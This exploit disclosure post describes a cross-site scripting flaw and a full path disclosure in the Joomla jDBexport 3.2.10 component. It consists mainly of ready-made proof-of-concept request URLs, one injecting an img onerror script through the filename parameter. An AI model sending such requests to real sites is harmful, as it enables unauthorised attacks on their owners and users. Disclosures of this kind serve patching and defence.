Joomla jDBexport 3.2.10 Cross Site Scripting / Path Disclosure
Posted on 26 April 2017
# Exploit Title: Joomla Component jDBexport 3.2.10 - Cross-site scripting / Full Path Disclosure # Exploit Author: Persian Hack Team # Discovered by : Mojtaba MobhaM (Mojtaba Kazemi) # Home : https://extensions.joomla.org/extensions/extension/core-enhancements/data-reports/jdbexport/ # Home : http://persian-team.ir/ # Telegram Channel AND Demo: @PersianHackTeam # Tested on: Linux # Date: 2017-04-26 # POC : # filename Parameter Vulnerable to Cross-site scripting : https://www.target.com/components/com_jdbexport/helpers/downloadDocument.php?cache=1&token1=6d13d67c326ce71e864d3826885f7f63&token2=L2hvbWUvcG9sa2Fkb3Rwb3dlcmhvdS9wdWJsaWNfaHRtbC9tZWRpYS9jb21famRiZXhwb3J0L2RvY3VtZW50cy8,&cachefiletype=xls&filename=%3Cimg%20src=%221%22%20onerror=alert%28%22XSS%22%29%3E5d0eb34b31&debugcomponent=1 # Full Path Disclosure https://www.target.com/components/com_jdbexport/helpers/downloadDocument.php?cache=1&token1=6d13d67c326ce71e864d3826885f7f63&token2=L2hvbWUvcG9sa2Fkb3Rwb3dlcmhvdS9wdWJsaWNfaHRtbC9tZWRpYS9jb21famRiZXhwb3J0L2RvY3VtZW50cy8,&cachefiletype=php&filename=[]&debugcomponent=1 # Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members # Iranian White Hat Hackers